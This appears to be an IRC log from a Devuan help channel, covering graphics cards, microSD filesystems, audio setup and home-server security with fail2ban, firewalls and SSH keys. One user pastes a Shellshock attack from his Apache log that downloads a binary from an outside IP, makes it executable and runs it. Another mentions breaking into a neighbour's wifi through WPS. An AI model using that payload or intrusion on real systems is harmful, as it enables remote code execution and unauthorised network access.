drwhite | Howdy peeps... What needs to be installed so that the system can recognise multiple graphics cards and use them all at once? Or is that something that has been removed? Or is it something that can be added quickly please? | 00:31 |
---|---|---|
djph | like SLI? | 00:44 |
drwhite | no. | 00:46 |
djph | so just randomly throwing two or more cards in the pc? | 00:47 |
drwhite | I have CPU and Discrete | 00:48 |
drwhite | that makes 2 | 00:48 |
djph | and you inly plug into one ... | 00:48 |
djph | *only | 00:49 |
djph | unless its a laptop, and you've got to slap primusrun or whatever AMD uses. | 00:49 |
drwhite | primusrun? | 00:51 |
drwhite | I don't have to do that with other version of Linux. | 00:51 |
drwhite | Ubuntu doesn't have it and it can run 2 GPUs fine. | 00:51 |
djph | primus is nvidia's split-gpu laptop tech. dunno what amd does. | 00:53 |
djph | for a desktop, one normally ignores the cpu ... though ive always had enough outputs on the nvidia cards ... | 00:54 |
drwhite | But on a laptop, not always, because I use a docking station. | 01:00 |
drwhite | So Primus will allow Devuan to use both the i7 chip and the Discrete at the same time? | 01:02 |
drwhite | On a desktop, I often use the CPU for the on-board, and then have a GPU as well. | 01:03 |
alexandros_c | Happy Thanksgiving to all my American friends | 01:06 |
drwhite | Anyone here have a Lenovo P52? | 01:18 |
drwhite | and running Devuan. (of course) | 01:18 |
Xenguy | pm-is-supported returned no output: anyone know how to interpret that result? | 01:19 |
drwhite | djph: Trying it now. Is there anything else that needs to be installed at the same time? | 06:11 |
drwhite | what is "libsystemd0" ? | 07:00 |
drwhite | is that systemD? | 07:00 |
KatolaZ | drwhite: it's a library to use the systemd functionalities | 07:05 |
KatolaZ | harmless if you don't have systemd running in your system | 07:06 |
drwhite | it can be uninstalled? | 07:07 |
drwhite | or is it for those things that use systemD to integrate into a non systemd environment? | 07:07 |
KatolaZ | drwhite: | 07:16 |
premoboss | if i set some part of File System in "Read-only" (i.e. /usr/), will the general performances speed up? | 11:45 |
debdog | sounds unlogical hence it's possible | 11:47 |
premoboss | debdog, i think that there is no overhead of journal and no file system check at the start up and no "you have mounted the partition n times, check forced" messages at start up. | 11:49 |
KatolaZ | premoboss: if you don't write on it there is no journal overhead... | 11:55 |
KatolaZ | but having /usr ro is normally a bad idea | 11:56 |
KatolaZ | unless you decide to not ever install anything in there | 11:56 |
KatolaZ | premoboss: I also don't understand what you mean by "some part of File System" | 11:57 |
premoboss | KatolaZ, as far as i remember, /usr is "almost" read only: i mean, after i installed all i need in my system, /usr should not be writable by any process, am i right? it is /home and /var that usually are often written inside. | 11:58 |
KatolaZ | premoboss: I fail to see the point though | 12:00 |
debdog | on a server inside the DMZ the more places are ro the better. but I doubt it'll increase 'general' performance | 12:00 |
KatolaZ | that's why I fail to see the point | 12:01 |
premoboss | KatolaZ, my OS is on uSD. the point is that i wish to reduce I/O on uSD to (i hope) increase performances (no journal, no forced check on that partition, etc) and to have less stress on uSD coming from frequent write operations. | 12:02 |
Centurion_Dan | premoboss: then use ext2 | 12:02 |
KatolaZ | premoboss: but if you don't write anything in /usr, then you don't write anything | 12:02 |
KatolaZ | fullstop | 12:02 |
Centurion_Dan | I do that for /boot | 12:02 |
KatolaZ | where should the performance gain come from, if you don't write under /usr? | 12:02 |
KatolaZ | where should the I/O come from if you don't write on /usr? | 12:03 |
KatolaZ | there should be no write operation at all under /usr if you don't install/upgrade/remove packages | 12:03 |
KatolaZ | irrespective of it being ro or not | 12:03 |
debdog | to improve the µSDs life I'd look into fs options like noatime | 12:04 |
premoboss | if i use ext2 AND i get not clear shutdown, then i can have inconsistent filesystem and forced check at reboot. so i need to make that /usr partition ext2 AND read only. sound right? | 12:04 |
Centurion_Dan | package installation aside there is little writing to /usr anyway, so mounting it with ext2 to get rid of the journal, and turning of noatime and you'll quiesce the writes to nearly nil anyway. | 12:04 |
premoboss | debdog, also noatime, yes, i forgot. and nodiratime also. | 12:04 |
KatolaZ | premoboss: no it sounds completely useless to me | 12:05 |
Centurion_Dan | premoboss: but a not clean shutdown only happens if you happen to be writing when the power is pulled. If the fs is not written to, it's not under risk of an unclean shutdown. | 12:05 |
premoboss | KatolaZ, if i have separate partition for /, /usr /home, /var, i will have faster check at the boot.. at least, i think so. | 12:06 |
premoboss | because /usr will be never checked because of read only. | 12:06 |
KatolaZ | premoboss: you are totally wrong on that | 12:06 |
KatolaZ | what you think is wrong | 12:06 |
Wonka | I have, once, had a debian on a Seagate Dockstar - rootfs was RO, and for updating I had a script using unbind and mount to get a shell in which alone the rootfs was re-mounted rw | 12:06 |
KatolaZ | you asked, we replied | 12:06 |
KatolaZ | you're free to decide yourself | 12:06 |
KatolaZ | just putting /usr ro is useless to reduce the load on a microSD | 12:07 |
premoboss | KatolaZ, ok | 12:07 |
premoboss | it was a good idea in my mind, no problem if i was wrong :-) | 12:07 |
gnarface | premoboss: try mounting /tmp as tmpfs instead | 12:23 |
Wonka | also /var/run | 12:31 |
system16 | Hi. i have a file server that runs no GUI or DE. i installed mpg123 on it. when i run mpg123 song.mp3 it says its playing it but there is no audio. i know this is silly . can this be a driver issue ? | 12:54 |
system16 | if yes , how can i install a generic driver for its built-in speaker ? | 12:54 |
gnarface | it's probably just a alsamixer settings issue | 12:55 |
gnarface | run alsamixer, make sure you've got volume on the right channels and they're unmuted | 12:55 |
gnarface | if it was a driver issue, usually you'd expect an error. not always, but usually. | 12:55 |
system16 | apt install alsamixer ? | 12:56 |
system16 | there is no package called alsamixer | 12:57 |
gnarface | it's in alsa-utils | 12:57 |
system16 | its downloading alsa-utils | 12:58 |
system16 | ok i ran alsamixer | 12:58 |
system16 | some bars showed up | 12:58 |
system16 | im not a audio guy. what do these mean ? | 12:59 |
gnarface | if you have more than one soundcard, these are only the controls for the first detected one | 12:59 |
system16 | it says master 0 | 12:59 |
gnarface | up/down arrows to change volume | 12:59 |
gnarface | "m" to toggle mute | 12:59 |
gnarface | left/right arrows to select volume slider | 13:00 |
system16 | 00 means mute ? | 13:00 |
system16 | or MM ? | 13:00 |
gnarface | MM is mute | 13:00 |
system16 | ok let me try again | 13:00 |
system16 | SHIt | 13:01 |
system16 | it worked | 13:01 |
system16 | thanks alot | 13:01 |
gnarface | no problem | 13:01 |
system16 | now i can make devuan run system initiated.mp3 on startup | 13:01 |
system16 | doo you know where is the startup directory ? | 13:02 |
system16 | do* | 13:02 |
gnarface | i don't know | 13:03 |
gnarface | there's a few ways to do it | 13:03 |
system16 | there is a script that runs commands on startup. i cant remember its name | 13:03 |
gnarface | are you thinking of /etc/rc.local? | 13:03 |
system16 | yes | 13:03 |
gnarface | that's probably the easiest thing to use if you're not using a GUI | 13:04 |
jyri | hmm, grub-install broke on ceres | 13:05 |
gnarface | uh oh | 13:05 |
jyri | grub-install: error: cannot copy `/usr/share/locale/bg.gmo' to `/boot/grub/locale/bg.mo': Is a directory. | 13:06 |
system16 | it wont break anything right ? (running a .mp3 file on startup ) | 13:06 |
gnarface | system16: nothing comes to mind | 13:07 |
system16 | damn. it has a loud speaker | 13:07 |
gnarface | it should be smart enough to save and restore the alsamixer settings on its own | 13:08 |
gnarface | you can call amixer directly from your script if you want though | 13:08 |
system16 | why tho ? | 13:08 |
gnarface | oh, if you wanted to turn the volume down, or make sure it never got set above some arbitrary maximum | 13:09 |
system16 | its set on 65 (master) | 13:09 |
gnarface | no physical volume control on the speaker? | 13:09 |
system16 | no | 13:10 |
gnarface | eh | 13:10 |
system16 | when it ran windows , i controlled the speaker with fn+f7 | 13:10 |
gnarface | i've got my headphones set to 33 | 13:10 |
gnarface | hardware's all different, but if it's loud at 65 that's not a huge surprise | 13:11 |
system16 | its a netbook. | 13:11 |
system16 | https://www.soundsnap.com/search/audio/system+initiated/score | 13:19 |
system16 | which one do you prefer ? | 13:19 |
gnarface | of what? don't make me click the link | 13:32 |
system16 | gnarface, those are some system startup sounds | 13:45 |
system16 | i chose "light speed sequence initiated" | 13:45 |
gnarface | oh, gotcha | 13:45 |
system16 | that stupid website wanted to charge me 3 $ for a 6 second file. (but i recorded the sound with my phone using AUX) hahaha | 13:46 |
system16 | also. should i install a terminal based anti virus to keep my stuff safe ? | 15:19 |
gnarface | it's probably not necessary if you are following best practices | 15:20 |
system16 | like ? | 15:20 |
system16 | root login is off | 15:20 |
system16 | system is up-to-date | 15:20 |
gnarface | just, if you know how permissions work and you've got it secure, yea, and up-to-date | 15:20 |
system16 | i have a strong password | 15:20 |
gnarface | network side too | 15:20 |
gnarface | don't click on email attachments, etc | 15:21 |
system16 | gnarface, everything inside home is 777 | 15:21 |
gnarface | :-P | 15:21 |
system16 | afaik | 15:21 |
gnarface | that might be unnecessarily risk | 15:21 |
gnarface | risky | 15:21 |
system16 | <gnarface> don't click on email attachments, etc there is -no- GUI | 15:21 |
gnarface | oh, right, you said that | 15:21 |
gnarface | yea, that'll really limit the attack surface too | 15:22 |
system16 | then what should i do ? 776 ? 767 ? | 15:22 |
system16 | the only thing that is really bugging me is ssh key | 15:22 |
system16 | i use ssh password username login | 15:22 |
gnarface | the defaults should have been sane | 15:23 |
gnarface | 755 | 15:23 |
system16 | idk | 15:24 |
system16 | some are 777 | 15:24 |
system16 | some are not | 15:24 |
system16 | only my ex drive is 777 | 15:24 |
system16 | i just found out its not | 15:25 |
system16 | so i think im good on permissions side | 15:25 |
system16 | what next ? | 15:25 |
system16 | fail2ban is running but idk how to configure it | 15:26 |
gnarface | firewall? | 15:26 |
system16 | my router has firewall | 15:26 |
system16 | its up-to-date. | 15:27 |
system16 | the router* | 15:27 |
system16 | gnarface, should i set up a firewall on the server too ? | 15:28 |
gnarface | wouldn't hurt | 15:28 |
gnarface | probably | 15:28 |
system16 | do you know how ? | 15:28 |
gnarface | i can give you some simple iptables commands that might work | 15:29 |
gnarface | nothing fancy | 15:29 |
system16 | thanks. go ahead | 15:29 |
system16 | i must be root right ? | 15:30 |
gnarface | yea | 15:30 |
system16 | it wont mess with ssh_d and sftp and open ssh right ? | 15:31 |
system16 | (this is a sftp server) | 15:31 |
gnarface | it will unless you leave a hole for ssh | 15:31 |
system16 | what | 15:32 |
system16 | oh its like windows firewall right ? | 15:32 |
gnarface | yea i guess | 15:33 |
system16 | then i cant run them rn | 15:33 |
system16 | because im using ssh | 15:33 |
system16 | and the server is under my closet | 15:34 |
system16 | (im feeling lazy right now) | 15:34 |
gnarface | well i'm sure you can find examples online | 15:34 |
nemo | why does devuan recommend following the LSB init conventions but does not have /usr/lib/lsb/install_initd ? | 15:35 |
nemo | is this some debian thing I'm unfamiliar with? | 15:35 |
system16 | the ultimate fix is to disable port forwarding | 15:35 |
system16 | which makes this only accessible on LAN | 15:35 |
nemo | system16: eh... I'm still super annoyed that my router does not have an option to block the HTTP server on the wifi interface - I don't need a full firewall, just option to specify interfaces for bind | 15:37 |
nemo | system16: sometimes the LAN is not super trustworthy either | 15:37 |
nemo | basically I occasionally have to give wifi password to folks visiting and I don't want to trust router's webserver given historical fails on that front | 15:37 |
system16 | nano like my neighbor wants to see whats on my server ? | 15:38 |
system16 | i managed to hack his wifi due to WPS | 15:38 |
nemo | can see why depending on LAN one might not trust it. also if the machine is a laptop could be on all kinds of hostile LANs | 15:38 |
system16 | with a simple android app on google play lol | 15:38 |
nemo | system16: when the local fios company was deploying in this area they issued everyone wifi with a 40 bit wep key | 15:38 |
system16 | i have disabled WPS | 15:38 |
system16 | of course im using WPA-2 | 15:39 |
nemo | system16: the funny thing about it was the wep key shared first 24 bits of an alphanumeric uppercase key with the network name | 15:39 |
nemo | just to make things easier ☺ | 15:39 |
system16 | they are dumb af | 15:39 |
nemo | but yeah. on most linux systems one knows what is running, so firewall is not super useful IMO | 15:39 |
nemo | system16: yeah you could manually "hack" it just by iterating over 36² combinations | 15:40 |
nemo | they did eventually fix that, although there's still a few of them floating around | 15:41 |
system16 | how the hell did you do this ?? 36^2 ??? | 15:41 |
system16 | its format is like textbooks | 15:42 |
nemo | hm? | 15:42 |
nemo | oh | 15:42 |
nemo | XCompose ftw ☺ | 15:42 |
nemo | I bind it to capslock key | 15:42 |
system16 | damn | 15:42 |
nemo | https://docs.perl6.org/language/unicode_entry#XCompose_(Linux) | 15:42 |
system16 | nemo can u hack my server ? | 15:42 |
nemo | system16: I also have some useful emoji in mine | 15:42 |
nemo | O_o | 15:43 |
system16 | probably not | 15:43 |
r3boot | nemo: a firewall is very useful tool, especially in the 'you know what runs' scenario, since stuff that's not supposed to run will be blocked by default + needs explicit whitelisting | 15:43 |
system16 | its security is to notch | 15:43 |
nemo | most "hacking" these days is spear phishing/social engineering | 15:43 |
system16 | top* | 15:43 |
nemo | r3boot: sure sure. it's just I happen to know what's running is all | 15:43 |
system16 | i mean can you force your way into my server ? | 15:43 |
system16 | brute force* | 15:43 |
nemo | r3boot: it's the rationale behind lack of default firewall on many distros | 15:43 |
r3boot | nemo: sure. And are you 100% sure that those apps dont make any outbound connections? How do you guarantee that? ;) | 15:44 |
nemo | including ubuntu and debian | 15:44 |
system16 | u need my username and password which is extremely long | 15:44 |
system16 | and my public ip | 15:44 |
nemo | r3boot: the services? I know which ones make outbound connections yes | 15:44 |
system16 | which changes every day | 15:44 |
system16 | or my ddns domain | 15:44 |
r3boot | nemo: and now one of your services is hacked + spawns a bind shell, now what? :) | 15:44 |
nemo | r3boot: and no I'm not going to review the code, although I've run netstat and such in past when something seemed odd | 15:44 |
nemo | r3boot: if I've been hacked firewall is not going to protect me | 15:45 |
r3boot | yes, it will, because it will block the connection to the bind shell | 15:45 |
nemo | … | 15:45 |
nemo | r3boot: if someone has root access it is game over | 15:45 |
nemo | firewall will do jack squat | 15:45 |
system16 | nemo, but can you ? | 15:45 |
r3boot | sure, but you dont run stuff as root right? | 15:45 |
r3boot | + you're patched & are running a RBAC framework, so getting root is not easily possible | 15:46 |
system16 | root login is off | 15:46 |
system16 | and there is no GUI | 15:46 |
system16 | no DE | 15:46 |
r3boot | all it takes is one vulnerable service | 15:46 |
nemo | r3boot: ok. I see scenario. for example. considering apache as service w/ a (large) attack surface. someone manages a local execute. trouble is. service is already doing outbound connections. so detecting that is pretty tricky apart from monitoring traffic | 15:46 |
system16 | plain command - line interface | 15:46 |
r3boot | nemo: apache normally only makes connections towards backend services, not towards the internet, so that's trivial to detect | 15:47 |
nemo | r3boot: apart from that there's not much exposed outbound to hack | 15:47 |
r3boot | that's obscurity | 15:47 |
r3boot | you want multiple levels of defense ;) | 15:47 |
nemo | r3boot: eh. I do have some relaying on mine | 15:47 |
system16 | r3boot, everything is uptodate | 15:47 |
nemo | r3boot: I understand *why* people have it | 15:47 |
system16 | i ran apt upgrade | 15:47 |
nemo | r3boot: and I even listed at least one case locally I wish I had it, and still don't | 15:48 |
system16 | im planning to put apt upgrade on startup | 15:48 |
nemo | I'm just questioning it being of super-high utility | 15:48 |
system16 | using rc.local | 15:48 |
r3boot | I just think it's bad advice to tell people /not/ to run a packetfilter | 15:48 |
r3boot | you should run one, by default, to ensure that you know what goes in/out of a system | 15:48 |
r3boot | + are able to provide guarantees for that | 15:48 |
nemo | ?? did I say they shouldn't? | 15:48 |
nemo | wut | 15:49 |
r3boot | I guess we have a difference in definition of 'super useful' | 15:49 |
nemo | anyway. devuan by default does not have one | 15:49 |
nemo | so I guess devuan is giving bad default advice too by your definition ☺ | 15:49 |
r3boot | almost no OS/Distro comes with a default-deny packetfilter :( | 15:49 |
system16 | is devuan safe out of the box ? | 15:49 |
nemo | ubuntu either | 15:50 |
nemo | hm | 15:50 |
nemo | although that might have changed | 15:50 |
r3boot | centos/rh does, but that comes with a default-allow ruleset | 15:50 |
system16 | im trying to setup fail2ban | 15:50 |
nemo | my information about ubuntu halted at 14.04 | 15:50 |
r3boot | the BSD's dont come with a firewall | 15:50 |
r3boot | nor do the commercial unices | 15:50 |
r3boot | (+ dont come with a firewall thats enabled by default) | 15:50 |
nemo | system16: anyway WRT "hacking" people, I lost any interest in that a long long time ago. basically once past college computer lab | 15:51 |
nemo | " | 15:51 |
nemo | "hacking" up stuff on my own system is way more fun/productive | 15:51 |
r3boot | The 'why' for that is much more difficult tho. Part of it has to do with people not understanding TCP/IP, part of it has to do with people not wanting to bother with packetfilters, etc | 15:51 |
system16 | do you think im at risk | 15:51 |
system16 | ? | 15:51 |
r3boot | system16: if you just stick to your part of the internet and dont piss off anybody, you'll be just fune | 15:52 |
system16 | wat ? | 15:52 |
r3boot | *fine | 15:52 |
system16 | port forwarding is ON. should i turn it off ? | 15:52 |
r3boot | port forwarding to *which* port? | 15:52 |
system16 | 22 | 15:52 |
r3boot | not a problem | 15:52 |
nemo | r3boot: the actual things that make my system significantly vulnerable (browser, intel boot manager, crappy ssh passwords) are not going to be mitigated by firewall | 15:52 |
nemo | r3boot: that's why I can't bring myself to care | 15:52 |
system16 | i tried changing it. no luck | 15:52 |
nemo | it's a significant complexity for the 0.1% case | 15:53 |
r3boot | nemo: even in those cases it's very useful. Run your vulnerable apps under a different userid than your login id, and use iptables with uid/gid matching to only allow the connections you want | 15:53 |
nemo | r3boot: at present I have exactly 2 things bound. ssh and apache | 15:54 |
* nemo | takes down apache again | 15:54 |
* r3boot | used to run my browser under a different user id which forced *all* connections through a proxy (no direct connection possible) | 15:54 |
system16 | LOL | 15:54 |
system16 | Server replied: pong | 15:54 |
system16 | i pinged the fail2ban server | 15:54 |
system16 | i think it pinged 127.0.0.1 ? | 15:54 |
r3boot | nemo: otoh, I work with servers most of the time, and on those boxen, you *want* outbound firewalling | 15:54 |
nemo | r3boot: yeah. sorry. don't care enough | 15:55 |
nemo | but I understand the attractiveness of that kinda thing | 15:55 |
r3boot | desktops are a lot harder to secure, yes | 15:55 |
nemo | r3boot: I don't work much with the servers at work, but AFAIK they are restricting traffic outside the server itself | 15:55 |
nemo | r3boot: on the various segmented LANs | 15:55 |
system16 | is 1 jail enough ? | 15:55 |
system16 | |- Number of jail: 1 | 15:55 |
system16 | `- Jail list: ssh | 15:55 |
KatolaZ | system16: it depends on the number of thieves.... | 15:56 |
system16 | what about sftp ?? | 15:56 |
system16 | should i add more ? | 15:56 |
r3boot | system16: maybe it would help you if you read up a little bit about hosting services before you ask such questions | 15:56 |
nemo | r3boot: like. I can ssh in to my dev server, but not out, and that has nothing to do with the rules on it. | 15:56 |
nemo | r3boot: got to fill out annoying amount of paperwork to do anything fun | 15:56 |
r3boot | nemo: ah, then you have firewalling on the network level I think | 15:57 |
nemo | that's what I said? | 15:57 |
r3boot | yep | 15:57 |
r3boot | or atleast, that's what I inferred based on the dev server, with vlans, and not being able to send out outbound traffic without filing paperwork | 15:58 |
nemo | 09:35 <+nemo> why does devuan recommend following the LSB init conventions but does not have /usr/lib/lsb/install_initd ? | 15:58 |
nemo | I'm trying to install a cylance service "properly" | 15:58 |
system16 | r3boot im just trying to keep uninvited guests out | 15:58 |
nemo | already had to hack up the .deb to make their stupid kernel module load on debian | 15:59 |
nemo | I thought install_initd would be the way to go | 15:59 |
nemo | (right now I just made the symlinks manually - but I added the header since the init manager complained) | 15:59 |
r3boot | system16: just use ssh pubkey authentication and disable password-based logins. Then you dont even need the complexity of fail2ban | 15:59 |
system16 | i tried that before | 15:59 |
system16 | cannot be done | 15:59 |
r3boot | LOL | 15:59 |
r3boot | why not? | 16:00 |
system16 | it would keep asking a password | 16:00 |
system16 | and it was too complex | 16:00 |
nemo | I'm running fail2ban just 'cause the log noise annoys me. also a couple of those assholes also spam my apache. one of them I knew and actually found something I was mildly careless with | 16:00 |
nemo | I mean. didn't do any harm, but was irritating | 16:00 |
r3boot | system16: right, okay, well, its /the/ solution for securing your ssh | 16:00 |
r3boot | system16: fail2ban will not protect you from accounts with bad passwords | 16:01 |
KatolaZ | system16: if it keeps asking for a password you have a problem in your sshd config | 16:01 |
system16 | i have a 11 character password | 16:01 |
system16 | it has every thing in it | 16:01 |
KatolaZ | o_O | 16:01 |
system16 | numbers...letters... etc. | 16:01 |
system16 | symbols | 16:01 |
KatolaZ | and you think that's "secure"? | 16:01 |
KatolaZ | :D | 16:01 |
system16 | at least its not 1234 | 16:01 |
r3boot | there are multiple things to check here. 1) Is pubkey auth enabled in sshd? 2) Is your authorized_keys file only readable by your own userid? and 3) is there any RBAC framework blocking access to authorized_keys? | 16:02 |
nemo | KatolaZ: well if someone is trying to guess by trial and error, almost anything that isn't "password" is probably fine - these people don't even bother with the published lists | 16:02 |
r3boot | oh, and 4) Are you passing your ssh key along with ssh? | 16:02 |
KatolaZ | is the .ssh/ folder only rx for the owner? | 16:02 |
r3boot | KatolaZ: yes | 16:02 |
r3boot | 0700 for .ssh, 0600 for authorized_keys | 16:02 |
KatolaZ | is the key the correct one? | 16:02 |
nemo | KatolaZ: I'm pretty sure most of the probes are just hunting for unsecured IoS stuff | 16:02 |
r3boot | assumptions ;) | 16:03 |
system16 | fyi i reverted every setting that i made. i have to start on square 1 | 16:03 |
system16 | ALSO | 16:03 |
r3boot | but okay, I'll shut up | 16:03 |
system16 | some apps wont use ssh key | 16:03 |
KatolaZ | system16: you also have to do some reading about ssh config | 16:03 |
r3boot | (way too many years of experience with hosting industries, I'll let you guys make your own mistakes) | 16:03 |
system16 | vlc does not support user pass auth | 16:04 |
nemo | O_o | 16:04 |
nemo | vlc supports ssh authentication? | 16:04 |
r3boot | Setup a ssh tunnel then :) | 16:04 |
nemo | whaaat | 16:04 |
nemo | what for? | 16:04 |
system16 | KatolaZ, i know what is that. i used that to disable root login | 16:04 |
system16 | nemo, to stream stuff to TV | 16:05 |
system16 | it has a sftp browser built in | 16:05 |
r3boot | chromecast stuff? Or some other protocol? | 16:05 |
system16 | yes. | 16:05 |
system16 | chromecast | 16:05 |
r3boot | that wont work over ssh, since that requires multicast | 16:05 |
system16 | well it works rn | 16:06 |
system16 | soo | 16:06 |
r3boot | well, not unless you setup a tun/tap device and either make that part of the layer2 segment, or enable multicast routing on your network | 16:06 |
nemo | system16: I don't know too much about your setup, but personally I'm not a huge fan of smart TVs - I settled on an old laptop plugged into TV - is super flexible as to playing whatever random stuff, and is also easy to transport ☺ | 16:06 |
* r3boot | has kodi for that | 16:07 |
system16 | this is a SFTP server | 16:07 |
system16 | and vlc supports sftp | 16:07 |
system16 | as simple as that | 16:07 |
r3boot | Aha, that's not a chromecast protocol ;) | 16:07 |
nemo | system16: so.. that's not super surprising then. sure | 16:07 |
system16 | and vlc casts that to my chromecast | 16:07 |
nemo | system16: like. tons of stuff uses gvfs - not too sure what vlc uses | 16:07 |
nemo | system16: but if it is using gvfs or similar then so long as your ssh key is in your keyring, it should just work | 16:08 |
r3boot | worse-case you could use sshfs | 16:08 |
system16 | i asked the vlc staff, they said future vlc ver. will *probably* support ssh key | 16:08 |
nemo | back when my SO was on her first-gen iOS I satisfied her desire to access her iphone from her linux machine using myTunes to fix the file naming plus ssh automount | 16:08 |
system16 | and i mainly use my server to stream stuff soo | 16:09 |
nemo | autofs + sshfs | 16:09 |
nemo | can use that if whatever the heck vlc is using is being a PITA for you | 16:09 |
nemo | it works surprisingly fast | 16:09 |
system16 | how many IPs does 1 jail house ? 1 ? | 16:09 |
r3boot | system16: you could also try to enable ssh multiplexing, and then (using autossh or a custom script) let your system establish the multiplexing tunnel. Next, reconfigure your vlc to just use ssh + connection multiplexing, and you can bypass authentication | 16:09 |
system16 | sounds like its not EZ | 16:10 |
nemo | but yeah in her case ~/Desktop/iphone when doubleclicked on autofs connected to the iphone so she could see her music | 16:10 |
r3boot | system16: hosting isnt easy ;) | 16:10 |
system16 | it is | 16:10 |
system16 | im doing it rn | 16:10 |
r3boot | ahja, okay, well, good luck then :) | 16:10 |
system16 | haha | 16:10 |
nemo | system16: bet vlc can also do HTTP, why not just share your local media over that? it's LAN anyway | 16:10 |
nemo | why not let everyone get to it? | 16:10 |
system16 | its no on lan | 16:11 |
nemo | ah | 16:11 |
system16 | its on the internet as well | 16:11 |
r3boot | Just chmod 0777 it ;+ | 16:11 |
r3boot | (no, dont do that!) | 16:11 |
nemo | system16: your chromecast tv is not LAN? O_o | 16:11 |
system16 | as i said. i have port forwarding enabled | 16:11 |
system16 | no no | 16:11 |
system16 | the sftp server is on wan and lan (thats what i meant) | 16:11 |
nemo | system16: ok... so... you'd still be fine w/ HTTP on LAN for VLC+chromecast ☺ | 16:11 |
nemo | and probably pretty trivial to enable | 16:12 |
nemo | heck maybe chromecast can read http too. dunno | 16:12 |
r3boot | nemo: but, is it an actual chromecast device? :) A chromecast uses rtmp-over-multicast, not sftp | 16:12 |
system16 | i live near a street filled w/ dru addicts | 16:12 |
system16 | drug* | 16:12 |
system16 | and my router has a strong antenna | 16:12 |
system16 | its wifi signal reaches the stree | 16:12 |
system16 | t | 16:12 |
system16 | i cant limit it because of stupid dlink | 16:13 |
nemo | r3boot: I think he said he was streaming to chromecast from vlc | 16:13 |
nemo | r3boot: and vlc was reading his movies off of the sftp server | 16:13 |
system16 | it has 3 options : antenna power : 100 % 50 % 25 % | 16:13 |
nemo | r3boot: and I was just suggesting HTTP as being maybe easier to setup for his local media library | 16:13 |
system16 | 50% is too low | 16:13 |
system16 | isnt http unsafe ? | 16:14 |
nemo | system16: what does your wifi signal have to do w/ this? you said the network was using WPA2 | 16:14 |
system16 | yes | 16:14 |
nemo | system16: http, https. whatever. it's your LAN. you claim it's encrypted already | 16:14 |
system16 | but it does not mean its unhackable | 16:14 |
nemo | system16: the only existing WPA2 hack attacks the device. make sure your devices are up to date ☺ | 16:14 |
system16 | it is | 16:15 |
nemo | (KRACK) | 16:15 |
system16 | is it possible to ditch wlan0 ? | 16:15 |
system16 | on the server | 16:15 |
nemo | is your house wired with cat5? | 16:15 |
system16 | (its connected via ethernet) | 16:15 |
r3boot | nemo: oh, like that, yeah | 16:15 |
system16 | i think the command started with ifconfig | 16:16 |
nemo | system16: anyway. if you don't trust your LAN, which is probably not unreasonable. HTTPS - whatever. | 16:16 |
system16 | https ? | 16:17 |
system16 | a web server ? | 16:17 |
nemo | 10:14 < system16> isnt http unsafe ? | 16:18 |
nemo | https + letsencrypt | 16:18 |
KatolaZ | o_O | 16:18 |
nemo | maximise devices that can connect to your movies ☺ | 16:18 |
system16 | ssh is better i think. because i can remotely manage my server | 16:18 |
system16 | nemo , right now, my freaking smart watch can connect to it | 16:20 |
nemo | system16: uh. you can have both running | 16:20 |
nemo | was just thinking it might be easier for your chromecast/phone/vlc/firefox/whatever | 16:20 |
* nemo | shrugs | 16:20 |
system16 | did you mean HTTPS file server ? | 16:20 |
nemo | yes | 16:20 |
system16 | oh | 16:21 |
system16 | its kinda cool. it will have a web server too | 16:21 |
nemo | judging from the spam in my apache log, not installing any CGIs or PHP interfaces avoids 99.9% of the attacks out there | 16:22 |
nemo | so just hosting static content, probably totally fine | 16:22 |
nemo | not to mention could just do it on LAN for starters | 16:22 |
system16 | currently , there are movies, photos and bunch of apps on the server | 16:23 |
nemo | some of the stuff in log is fairly entertaining | 16:23 |
nemo | example | 16:24 |
system16 | OH | 16:24 |
nemo | 222.186.138.49 - - [12/Jan/2018:13:18:39 -0500] "GET / HTTP/1.1" 200 5710 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.158.162.80:258/synliang -O /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { | 16:24 |
system16 | did i mention that | 16:24 |
nemo | :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.158.162.80:258/synliang -O /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo /tmp/China.Z-hqqf\xc0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" | 16:24 |
system16 | this server is not on all the time ? | 16:24 |
nemo | that script does not seem very efficiently written | 16:24 |
system16 | i suspend it when i dont need it | 16:24 |
system16 | and it does not support WoL so no one can wake it up on lan or wan | 16:25 |
nemo | system16: oh it was you doing that | 16:25 |
nemo | system16: yeah. I was wondering why you don't just leave it on all the time using a low power device ☺ | 16:25 |
nemo | system16: I think I ran numbers and based on machine you are using now, an RPI would pay for itself in about a year | 16:25 |
system16 | 2 reasons 1- its a netbook i dont want to put pressure on it. 2-safety | 16:25 |
system16 | 3-why not ? | 16:25 |
nemo | 'cause having it on all the time is more convenient | 16:26 |
nemo | ② is pretty dubious | 16:26 |
nemo | ① is fixed by switching to an RPI zero ☺ | 16:26 |
system16 | i have plugged in a wireless usb mouse. when i right click it. it wakes up | 16:27 |
* nemo shrugs | 16:28 | |
nemo | system16: might be out and about one day and wishing you didn't have it suspended to get to something at home | 16:28 |
system16 | if it works it aint stupid :) | 16:28 |
system16 | yes. thats the only down side | 16:28 |
mooseface420 | dragon isn't playing audio and vlc install failed lol | 16:41 |
jordila | i would like to downgrade from Firefox-ESR actually in v60 to v52. If possible which is the recommended path to ? | 16:48 |
nemo | mooseface420: I had VLC install problems some time ago, that were due to having wrong repos after migration to ascii | 16:49 |
nemo | mooseface420: no idea if your problems are same | 16:49 |
nemo | jordila: so. 52 is unsupported at your own risk - you should download a zip of it off the mozilla server, and run it standalone yourself | 16:49 |
nemo | jordila: noscript strongly recommended - and I understand why you are doing this... one of my firefox profiles is still on 52 | 16:50 |
nemo | hell. one's still on *4* due to the occasional legacy crap that only speaks old versions of https | 16:50 |
nemo | jordila: but yeah. it's obviously a dangerous thing to do | 16:50 |
nemo | jordila: if you list the extensions you're dependent on, could try seeing if there's finally versions of 'em out there | 16:51 |
